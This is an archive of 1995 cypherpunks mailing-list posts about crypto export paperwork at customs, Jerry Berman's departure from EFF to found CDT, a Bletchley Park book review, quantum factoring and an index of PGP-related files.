From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sun, 1 Jan 95 09:21:32 PST
To: rishab@dxm.ernet.in
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <gate.ZHT0Xc1w165w@dxm.ernet.in>
Message-ID: <9501011723.AA12712@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>Just which form did they sign, exactly? These procedures remind me of Feynman'
 s
>refusal to sign more than 12 times during some government talk.

The license itself has a space for the customs people to "endorse"
each export/re-import.  Interestingly, I can't figure out how to
distinguish between the signature I got when I left and the one I
got when I came back.  There are just two signatures and stamps
on the back of the license, one dated when I left and one dated when
I returned.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Sun, 1 Jan 95 13:21:15 PST
To: cypherpunks@toad.com
Subject: good news about the EFF...
Message-ID: <199501012115.NAA06292@art.net>
MIME-Version: 1.0
Content-Type: text/plain


This might be of interest:


 ---------- Forwarded message ----------
 Date: Tue, 20 Dec 1994 17:04:23 -0800
 From: Brock N. Meeks <brock@well.sf.ca.us>
 To: cwd-l@cyberwerks.com
 Subject: CWD Changes in the Wind At EFF


 CyberWire Dispatch // Copyright (c) 1994 //

 Jacking in from the "Back to the Future" Port:

 Washington, DC -- The Electronic Frontier Foundation has fired its Policy
 Director Jerry Berman and will soon release a sweeping new agenda for 1995
 that promises to return the organization to its original grassroots
 beginning.

 Asked to comment on his firing, Berman bristles and says:  "I think that's
 baloney." Then he quickly adds:  "Did you ever think I might have wanted to
 leave?"

 Berman has, in fact, left EFF, to head a new, as yet unannounced, policy
 group called the Center for Democracy and Technology.  His departure from
 EFF and the creation of CDT will be made public this week in a joint
 announcement with EFF, sources said.  The official line that will be spun
 to the public is that the two came to a "mutual parting of the ways."

 That benign statement, however, doesn't reflect the long hours of the
 behind the scenes deliberations, in which the language of the press
 releases will be a cautiously worded as an official State Department
 briefing.

 Heroes and pioneers always take the arrows;  EFF lately has looked more
 like a pin-cushion than its self-appointed role as protector of all things
 Cyberspace.  The beleaguered organization has over the course of the past
 two years endured often withering criticism from the very frontier citizens
 it was sworn to uphold and protect.

 The reason:  A perceived move away from its grassroots activism to the role
 of a consummate Washington Insider deal maker.

 Berman is the man largely responsible for cutting EFF's policy cloth.  He
 wears the suit well.  Maybe too well.  Although he has the political acumen
 to arm-wrestle inside-the-beltway, it comes at the expense of his
 management style, EFF insiders said.  Those shortcomings came at the
 expense of EFF's day-to-day operations and didn't go unnoticed by its board
 of directors.

 The EFF board in October fired Berman for mismanaging the group's
 organizational and fiscal responsibilities.  No impropriety or malfeasance
 was alleged, the board was simply dissatisfied with Berman's day-to-day
 managing of the shop.

 In a precursor to the board's October decision, it split Berman's job,
 giving him charge of just the policy arm, which board members said played
 to his strength.  They then hired Andrew Taubman as executive director to
 oversee the day to day tasks.

 Separate from the organizational and fiscal misgivings, the board also
 couldn't brook with priority on policy affairs that Berman had engineered.
 Although Berman expertly navigated EFF through the choppy political waters
 of Washington, that course increasingly steered the organization away from
 its original vision as a populist group.

 Never was the hardcore policy-driven slant of EFF more apparent than during
 the two-plus year political firestorm that surrounded the FBI's infamous
 Digital Wiretap.

 The political wrangling during that time, in which Berman brokered the
 influence of EFF with the backing of the telephone, computer and software
 industries, to reach a compromise with legislators and the FBI on the
 bill's language, increasingly drove a wedge between the organization and
 its grassroots membership.

 Nobody within EFF interviewed for this article disagreed with how Berman
 ran his policy tour de force.  In fact, the board was generally in
 agreement that Berman did an excellent job in helping to broker a less
 nefarious version of the FBI's wiretap bill than would have otherwise
 passed without his involvement on EFF's behalf.

 As effective as Berman was in shuffling between the political and
 ideological interests of EFF and its members, the "inside baseball"
 political bullshit was largely lost on the community of the Net, who viewed
 it as a kind of betrayal.

 The fact that there would be a backlash from the Net came as no surprise to
 Berman and EFF, who recognized the fine line they had to walk in dealing
 with a politically charged issue rivaled only by the Administration's
 insipid Clipper Chip encryption policy.

 You see, the Net community is a binary braintrust, a world of ones and
 zeros -- either on or off -- in which shades of grey are rarely an option.
 Yet it is exactly these shades of grey in which Berman excels and thrives.
 It is a skill --  and damn near an art form -- to be able to move among the
 shadows and Washington's land of a thousand different agendas.  And that's
 right where Berman had steered EFF.

 However, it's not where the EFF board thought the organization belonged.

 And so, in a few days the Net community will read a grand announcement in
 which EFF and Jerry Berman state they've had a "mutual parting of the
 ways."    The announcement will be several fold, including:

 -- The formation of  Berman's new Center for Democracy and Technology.

 -- That EFF has hired current board member David Johnson, currently a
    computer law attorney with the Washington law firm of Wilmer, Cutler and
    Pickering, to be its new policy director, although that exact title has
    yet to be finalized.

 -- A new policy agenda for EFF that includes creation of an annual "State
    of the Net" report.

 EFF Executive Director Taubman declined to comment on Berman's firing,
 saying only that the organization and its former director had, indeed,
 agreed to a "mutual parting of the ways."    He said EFF and Berman's new
 group would continue to work closely with each other and that the efforts
 of each would be mutually beneficial.

 Johnson said he was excited about the new policy efforts he would be
 heading up for EFF, which, in addition to the "State of the Net" report,
 includes commissioning papers and studies to help build a more solid idea
 of what exactly constitutes the Net "community" on a global basis and
 helping to define the Net's community as recognizable legal entity.

 In addition to the new policy efforts, Johnson will have to restock EFF's
 policy department:  All the EFF policy wonks have jumped ship, resigning
 their positions and joining with Berman's new venture.

 The upheaval at EFF -- which included moving the entire operation here to
 new digs in Washington -- apparently hasn't hurt moral which has "never
 been higher," Taubman said.

 Underscoring Taubman's remarks is EFF's on-line legal council Mike Godwin,
 who said the changes "create an opportunity for us to return to our more
 populist mission and vision that we started with."


 All Things Being Equal
 =================

 Adversity for a political junkie is the warp and woof  of  Washington
 culture.  Berman is no worse for the wear, having parachuted out of EFF and
 into his new organization. He said CDT will be differ from EFF "on what to
 emphasize."  That emphasis will be to focus on "on the ground public
 policy," he said.

 And it won't only be Berman's staff that sets the scene for familiarity as
 he jump starts CDT.  The former EFF policy staffers will supply him with
 horsepower and his political currency will open doors.  But he needs cold
 hard cash to feed the troops and pay the rent.

 That means his new organization must have financial backing and here, too,
 there are no strangers.  Berman's bringing along a fair chunk of EFF's
 corporate sponsors to his new home.

 Companies providing seed money to Berman's CDT include AT&T, Bell Atlantic,
 Nynex, Apple Computer and Microsoft.  These same companies provided a
 combined $235,000 in donations to EFF in 1993, minus Nynex, which wasn't
 listed as a major donor (over $5,000) on EFF's tax returns.

 It's not known if these companies will continue to fund EFF in full or in
 part or what amount they have pledged to Berman's group.  Just how
 well-heeled CDT is and exactly who makes up the full roster of its
 sponsorship remains to be seen.  We'll know that after the organization
 files its first tax returns, which will be a matter of public record.


 Meeks out...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raph@netcom.com (Raph Levien)
Date: Sun, 1 Jan 95 13:45:35 PST
To: cypherpunks@toad.com
Subject: Berman resignation
In-Reply-To: <199501012115.NAA06292@art.net>
Message-ID: <199501012145.NAA10782@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Brock's piece on Jerry Berman's resignation broke about a week after I
sent my EFF t-shirt back, attn Jerry Berman.

Never again believe that cypherpunk political action doesn't make a
difference.

Raph

(BTW, I got a nice apology from Peter Lewis about the NYT article.
Apparently, it got shredded in the editing process)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 1 Jan 95 12:38:42 PST
To: cypherpunks@toad.com
Subject: Stegno for Kids
Message-ID: <199501012039.AA14592@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



I was at a birthday party for a nine-year old niece. She got some dolls
(ugh), a Sega Game Gear Game called "Out Run" (not bad) and Crayola brand
secret writing pens (WOW!!!!). There are about 8 pens in the set. You write
secretly with two of them and develop the image with the other six. I believe
the 6 developing pens create images in different colors, but I'm not sure.
It just wouldn't look cool for me to rip open the package at SideShow Pizza
and hog her gift. Then I had to go. Alas... 

-Peter 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 1 Jan 95 04:00:48 PST
To: cypherpunks@toad.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <gate.ZHT0Xc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze <mab@research.att.com>:
> So we chatted about computers and cryptography for a while.  Finally,
> the two of them decided that it wouldn't really hurt for them to just
> sign the form as long as I promise to call my lawyer and get the SED

Just which form did they sign, exactly? These procedures remind me of Feynman's
refusal to sign more than 12 times during some government talk.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Terka <werewolf@io.org>
Date: Sun, 1 Jan 95 14:54:07 PST
To: cypherpunks@toad.com
Subject: The Code Breaker's Work Bench?
Message-ID: <Pine.BSI.3.91.950101175233.8993A-100000@nudge.io.org>
MIME-Version: 1.0
Content-Type: text/plain


I saw someone mention this program on sci.crypt once. Its supposed to be
an aid to those trying to break a cypher. 

Does anybody know the ftp site it is located on? unimi.it perhaps?

--------------------------------------------------------------------------
Mark Terka     | werewolf@io.org             | public key (werewolf) by
Toronto,Canada | dg507@cleveland.freenet.edu | public key server or request
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 5 Jan 95 01:07:06 PST
To: cypherpunks@toad.com
Subject: Re: another factoring thing. . . .
Message-ID: <ab2d005d03021004c39a@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 PM 12/30/94, camp@industrial.com wrote:
>Hey did anyone see the artical, some time ago in Science News (May 14,
>1994) their was this artical on using a 'quantum computer'.  Through
>the marvels of quantum mechanics it is theroretically possible to
>build a computer that would be really good at factoring large numbers
>such as the ones used in RSA.  This combined with team sieving could
>possibly be used to signifigantly reduce the time required to factor
>a key.  Any thougts, did anyone else see the artical, has there already
>been a really stimulating discusion that I missed?  Well let me know.
....
I think that that kind of quantum computer is much less likely to be built
to impact RSA style crypto, than some revolutionary sort of factoring
algorithm. It is not clear whether the tolerances required for the quantum
computer can ever be met and it is not entirely clear if the quantum
principles are correct. I don't entirely rule it out however.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gnu
Date: Sun, 1 Jan 95 18:55:23 PST
To: cypherpunks@toad.com, gnu
Subject: Book review: Codebreakers, the Inside Story of Bletchley Park
Message-ID: <9501020255.AA13843@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This is NOT David Kahn's excellent book "The Codebreakers".  This is a
British volume full of personal stories of thirty people who worked at
Bletchley Park or at British code-breaking in the field during WW2.
I found it a very touching and personal book.  Each person tells their
own story in a five- or six-page essay, and the stories cover a whole
range of activities, from cryptanalytical work to typing-and-filing
to the people who constructed and maintained the physical buildings.

As the introduction says, "...few of the events described here were
chronicled at the time, and those who worked at Bletchley and its
outstations were forbidden to talk or write about it -- almost to
remember it.  The compiling of this book has rested almost entirely on
personal memories; and that is unusual in an account which pretends to
any sort of accuracy.  Moreover, nobody who worked at Bletchley can
now be under 65; several contributors are in their mid-80s.  For all
of us clear and accurate recollection of highly specialized Top Secret
facts across fifty years has been a demanding task, requiring much
cross-checking."

There are lots of details about how real live wartime code-breaking
worked fifty years ago -- details I have seen nowhere else.  I
recommend this book to any cypherpunk.

Codebreakers: the inside story of Bletchley Park.  ed. by Francis
Harry Hinsley and Alan Stripp.  Oxford, England: Oxford University
Press, 1994 (hardback issued in 1993).  ISBN 0-19-285304-X.  US$13.95,
at my local bookstore.

--
John Gilmore                gnu@toad.com  --  gnu@cygnus.com  --  gnu@eff.org
 A well-regulated intelligentsia, being necessary to the security of a free
 State, the right of the people to keep and bear books, shall not be infringed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 1 Jan 95 17:49:30 PST
To: werewolf@io.org (Mark Terka)
Subject: Re: The Code Breaker's Work Bench?
In-Reply-To: <Pine.BSI.3.91.950101175233.8993A-100000@nudge.io.org>
Message-ID: <199501020148.UAA23008@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I saw someone mention this program on sci.crypt once. Its supposed to be
| an aid to those trying to break a cypher. 

From cbw.doc:

Overview
     The Crypt Breakers' Workbench (CBW) is an interactive
multi-window system for mounting a cipher-text only attack on a file
encrypted by the Unix crypt command.  CBW is a workbench in the sense
that it provides the user with an integrated set of tools that
simplify the initial, middle and final portions of the decryption
process.  A user interacts with the workbench by choosing tools and
setting parameters.  CBW carries out the work and displays the
results.  A moderately experienced user of CBW can easily decrypt both
long and short messages when bigram statistics are known for the
message space.  The basic cryptanalytic techniques used by CBW are
described in a paper by Reeds and Weinberger that appeared in the
October 1984 issue of the ATT Bell Laboratories Technical Journal.
This manual explains the capabilities and operating procedures of CBW

coast.cs.purdue.edu:/pub/tools/unix/cbw.tar.Z





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 1 Jan 95 18:59:46 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Ch-ch-ch-ch-changes...
Message-ID: <Pine.ULT.3.91.950101204945.29467B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I read with interest about the (about time) reorganization of the EFF.  
While it is certainly a little early to make any kind of final decisions 
about the EFF, I do wonder a few things:

What will the EFF now be doing now that isn't already done by other
organizations? 

It sure seems to me that this CDT is awfully similiar to the CPSR, except
it's headed by former EFF people who have been puckering up to the
Washington politicos, the Telcos and other entities for the past few 
years.  Is there really a purpose?

Any thoughts on how the EFF will change it's approach?  I'm due for
renewal in March and I want to make sure I'm not flushing my money away. 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwdsDDokqlyVGmCFAQFFlwP+NHiRjJPt8wqe4TuPoHrlAp9lbbu1Y2eZ
foacY3htQgeXc2S4lcKbAvFAMEYpmjYw27IKpjSKXkuqML0x6uL7h9AGmc5EcP7h
ZwWrOLhrqxqQNehGaxB6/2tqlb2W0usAkl3fwZPz/hJEPaR++ajmx/eunGFT8S6w
pQWlpZL1K/0=
=cuip
-----END PGP SIGNATURE-----


____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=> All I want is a cure...  
   \/   Finger for PGP Public Key  <=>      And all my friends back!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Sun, 1 Jan 95 18:55:05 PST
To: cypherpunks@toad.com
Subject: Re: The Code Breaker's Work Bench?
In-Reply-To: <199501020148.UAA23008@bwh.harvard.edu>
Message-ID: <dCs1lOwscMS7075yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501020148.UAA23008@bwh.harvard.edu>,
Adam Shostack <adam@bwh.harvard.edu> wrote:
>
>| I saw someone mention this program on sci.crypt once. Its supposed to be
>| an aid to those trying to break a cypher. 
>
>>From cbw.doc:
>
>Overview
>     The Crypt Breakers' Workbench (CBW) is an interactive
>multi-window system for mounting a cipher-text only attack on a file
>encrypted by the Unix crypt command.  CBW is a workbench in the sense

Ok....I thought it was more generic than that.

To mount an attack on an opponent requires specific programs oriented
toward the cypher in question. Can anyone suggest what programs / tools
may be out there for cypher busting?

I'm just curious....and no, I'm not planning on reading my girlfirend's
mail :>. I'm just interested in the methods exist in the real world. Hell, I'd
even be interested in a program to bust Enigma. That would give a basic example
or idea of how codebreakers operate on a day to day basis.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLwdk13BFBj7pSNyhAQFqoQf+MbB7ffw3gaFuynO3riyL0MSF/143a5d3
TnbnzsMd+srKSx3bhp4SkcgIazrP3h9DzpAyriFLJl+zfdPz+kFOQGZfwPfZvEu3
fwCO+ClrKBqnJ/WiMZ0aluxfFz5NkIDolwLeeW2UfzOEcGsN4DuFvpJ66PRgLZRg
Uw3qouzBjljTazyFjVlH1VaxWbywQrhiCotPvgXCrMY+CBO3FXcPW6w7pYHi8Ovh
yelANTkI9cSe7f1BE0ONaEac2Xhb1htdB99goRIbxQbqP1zKUsBM+JzGvkpr4gKT
ihEV3EFBGW3EGHDrCkdDqox4hnl0HRkdsH3MWt9prJXvbXvBUIfxtA==
=9fAE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Sun, 1 Jan 95 22:49:38 PST
To: cypherpunks@toad.com
Subject: I'm back. :)
Message-ID: <199501020643.WAA08339@art.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi folks,

I finally got back on cypherpunks. Have been incredibly busy
but wanted to keep intouch as several artist friends of mine
want to start using art as a encryption vehical... Should be
fun...

Happy New Years. Let's hope it's a good one for cryptography. 

-lile


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lile Elam	    |  "a brush in hand, a wisp of wind, she sighs 
lile@art.net        |   knowing that this will be the great one..."	
http://www.art.net  |						    -lile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 1 Jan 95 20:21:50 PST
To: gnu@toad.com
Subject: Re: Book review: Codebreakers, the Inside Story of Bletchley Park
In-Reply-To: <9501020255.AA13843@toad.com>
Message-ID: <199501020423.XAA26847@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Let me wholeheartedly echo John's recommendation; this is a terrific
book, one from which I learned a great deal.  You'll get more out
of it, however, the more you already know about the Bletchley Park
efforts and the principles on which the Enigma and Lorenz machines
operated.  In particular, Welchman's "The Hut Six Story" (McGraw
Hill, 1982) makes good preparatory reading.  Unfortunately, that
book has been out of print for some time, but is fairly widely
available at used book shops.

I had the opportunity to visit Bletchley Park a couple of weeks
ago.  Most of the original huts are still standing, albiet in
various states of disrepair.  Walking around the site, knowing
something of what went on there in complete secrecy 50 years ago,
I could only imagine the sense of urgency and bustle that must have
been in the air with 12000 people working (day and night, over
three shifts) in a relatively small space.  The more I learn about
the effort the more impressed I am with the accomplishments that
took place there.  In particular, the path from basic research to
operational functionality was far shorter than one would think
possible.

After the war, the site was used by GCHQ and by British Telecom as
a training center.  It was recently saved from redevlopment and is
now being converted into museum.  Among the projects taking place
there is a construction of a working model of the original "Colossus"
machine, arguably the first electronic computer ever built (it was
used in breaking the Lorenz teleprinter cipher).  I believe the site
is currently open for visitors on alternate weekends.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aron Freed <s009amf@discover.wright.edu>
Date: Sun, 1 Jan 95 23:04:48 PST
To: Lile Elam <lile@art.net>
Subject: Re: good news about the EFF...
In-Reply-To: <199501012115.NAA06292@art.net>
Message-ID: <Pine.SUN.3.91.950101232113.15557A-100000@discover>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Jan 1995, Lile Elam wrote:

>  CyberWire Dispatch // Copyright (c) 1994 //
> 
>  Jacking in from the "Back to the Future" Port:
> 
>  Washington, DC -- The Electronic Frontier Foundation has fired its Policy
>  Director Jerry Berman and will soon release a sweeping new agenda for 1995
>  that promises to return the organization to its original grassroots
>  beginning.
> 
>  Asked to comment on his firing, Berman bristles and says:  "I think that's
>  baloney." Then he quickly adds:  "Did you ever think I might have wanted to
>  leave?"
> 
>  Berman has, in fact, left EFF, to head a new, as yet unannounced, policy
>  group called the Center for Democracy and Technology.  His departure from
>  EFF and the creation of CDT will be made public this week in a joint
>  announcement with EFF, sources said.  The official line that will be spun
>  to the public is that the two came to a "mutual parting of the ways."
> 
>  That benign statement, however, doesn't reflect the long hours of the
>  behind the scenes deliberations, in which the language of the press
>  releases will be a cautiously worded as an official State Department
>  briefing.
> 
>  Heroes and pioneers always take the arrows;  EFF lately has looked more
>  like a pin-cushion than its self-appointed role as protector of all things
>  Cyberspace.  The beleaguered organization has over the course of the past
>  two years endured often withering criticism from the very frontier citizens
>  it was sworn to uphold and protect.
> 
>  The reason:  A perceived move away from its grassroots activism to the role
>  of a consummate Washington Insider deal maker.

Has anyone seen Monty Python's Life of Brian.....  DO I hear a parallelism???
Something to the effect of "The PEople's Judean Front", "The Popular 
People's Front", and it goes on an on....

HOw about for the modern approach.... CDT, EFF, CPSR, Cypherpunks... Do I 
hear more.. Or are we so split up that we can't agree on our common goal....

Aaron




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Mon, 2 Jan 95 00:55:30 PST
To: marc@cam.ov.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <199501020848.AAA08819@art.net>
MIME-Version: 1.0
Content-Type: text/plain


But what if that plane crashed...

It's better to spread people out over several flights...

-lile




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@skypoint.com (Samuel Kaplin)
Date: Sun, 1 Jan 95 23:25:31 PST
To: cypherpunks@toad.com
Subject: Listing of Files on the Auto-Responder as of 01-01-95
Message-ID: <RWw1lKjqRSwN075yn@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Last Modified: 01-01-95 20:30 (CST)

This is the index for Sam Kaplin's Auto-Responder. To get a file:

Send a message to: skaplin@c2.org

The the subject of the message MUST BE: SEND FILE [file_name]

EXAMPLE:
        Subject: SEND FILE help     <----Case Sensitive!!!

All binary files are UUENCODED with PGP signatures. Please address all
comments or problems to skaplin@skypoint.com. If you receive a blank
message back, then the file you requested does not exist. Should you have
a crypto related file that you would like added, contact me at:
skaplin@skypoint.com. Please note that I am subject to the petty whims of
the U.S. government, so I will not add any files which may be subject to
ITAR.

- --------------------------------------------------------------------------
File Name                       Description
- --------------------------------------------------------------------------
apgp212_1.uue           Autopgp 2.12 offline mail packet processor.
                        Automates PGP functions. Part 1 of 4

apgp212_2.uue           Autopgp 2.12 offline mail packet processor.
                        Automates PGP functions. Part 2 of 4

apgp212_3.uue           Autopgp 2.12 offline mail packet processor.
                        Automates PGP functions. Part 3 of 4

apgp212_4.uue           Autopgp 2.12 offline mail packet processor.
                        Automates PGP functions. Part 4 of 4

apgp22b2_1.uue          Autopgp 2.2b2 offline mail packet processor.
                        Automates PGP functions. Part 1 of 4 BETA

apgp22b2_2.uue          Autopgp 2.2b2 offline mail packet processor.
                        Automates PGP functions. Part 2 of 4 BETA

apgp22b2_3.uue          Autopgp 2.2b2 offline mail packet processor.
                        Automates PGP functions. Part 3 of 4 BETA

apgp22b2_4.uue          Autopgp 2.2b2 offline mail packet processor.
                        Automates PGP functions. Part 4 of 4 BETA

cp-faq1.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 1 of 11

cp-faq2.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 2 of 11

cp-faq3.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 3 of 11

cp-faq4.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 4 of 11

cp-faq5.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 5 of 11

cp-faq6.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 6 of 11

cp-faq7.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 7 of 11

cp-faq8.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 8 of 11

cp-faq9.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 9 of 11

cp-faq10.uue            Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 10 of 11

cp-faq11.uue            Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 11 of 11

crypto1.uue             The Faq from talk.politics.crypto. A general overview
                        of cryptography. Part 1 of 2

crypto2.uue             The Faq from talk.politics.crypto. A general overview
                        of cryptography. Part 2 of 2

help                    This file.

key                     Sam Kaplin's PGP Public keys.

news_gateways           A listing of Mail -News gateways

pgpfaq1.uue             Frequently asked questions about PGP.
                        Part 1 of 2

pgpfaq2.uue             Frequently asked questions about PGP.
                        Part 2 of 2

rsa1.uue                A Faq put out by RSA outlining cryptography as it
                        applies to RSA. Part 1 of 2

rsa2.uue                A Faq put out by RSA outlining cryptography as it
                        applies to RSA. Part 2 of 2

remailer_list           A current listing of remailer sites.

wherefaq.long           Where to obtain PGP. (Long Version)

wherefaq.short          Where to obtain PGP. (Short Version)

yn075_1.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 1 of 14

yn075_2.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 2 of 14

yn075_3.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 3 of 14

yn075_4.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 4 of 14

yn075_5.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 5 of 14

yn075_6.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 6 of 14

yn075_7.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 7 of 14

yn075_8.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 8 of 14

yn075_9.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 9 of 14

yn075_10.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 10 of 14

yn075_11.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 11 of 14

yn075_12.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 12 of 14

yn075_13.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 13 of 14

yn075_14.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 14 of 14

==============================================================================

Interpretation is the revenge of the intellect upon art.
                         - Susan Sontag

==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLwepPslnXxBRSgfNAQFjuAf/YfaeENpC16siv7SB9rkg6x1SiM5aup6n
GXQQXaXtPA1pxgLDhv6gOgt/Zy/1M6tTJ/4uU2ft1KDU8wHlVt2JiU3d9/9JweZM
zbpDCqh0ucyfRht2V27WMfYYfTXUQ7yHiWIg9gf2ODqQcwMEu8kAwTYZxXFmXDQ+
9Xxchw7VR4ZGTo3cnPoh0526yKGBbi9hBr0vCr/IkTGH4cgf3BfXIF8Eolu4hQY3
r6XwcBYskN5afd/fVKA1qRhLkI3X9nP4oBNlVxdSs2cwgabQ2hZsExwtCwvHMi3K
zGWAwZkd1VNMX4rC+uUkuEOR0GB9OikcRYoU9vvKDSHO1n6amnQamQ==
=eeBK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@icicle.winternet.com>
Date: Sun, 1 Jan 95 23:44:20 PST
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>
Message-ID: <Pine.SUN.3.91.950102013630.23484A-100000@icicle.winternet.com>
MIME-Version: 1.0
Content-Type: text/plain


I couldn't agree with the general drift much more.

The real objective is to get the customs officials used
to the procedure of dealing the cryptograhic materials.

Your best asset is a good feature reporter and a photograher.

Right now, I don't think U.S. Customs is going to ask you if you
have PGP in your PC if you leave the country, or return either.

They should, and I'd be proud to say yes.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                               REGISTERED PGP KEY NO.0C91594D     
carolann@icicle.winternet.com       finger carolann@winternet.com |more
***********************************************************************
My WWW Homepage Page is at:    http://www.winternet.com/~carolann


On Mon, 2 Jan 1995, Marc Horowitz wrote:

> >> My conclusion from all this is that it just isn't possible for an
> >> individual traveler to follow the rules. 
> 
> I can think of a at least half a dozen cypherpunks who will be going
> to IETF in Stockholm in July.  I suspect there are more.  Perhaps we
> should all arrange to take the same flight, while carrying some bit of
> approved-for-export material.  Should drive the Customs guys
> completely nuts.
> 
> 		Marc
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Tue, 3 Jan 95 19:28:47 PST
To: cypherpunks@toad.com
Subject: NYT article and LaMacchia case
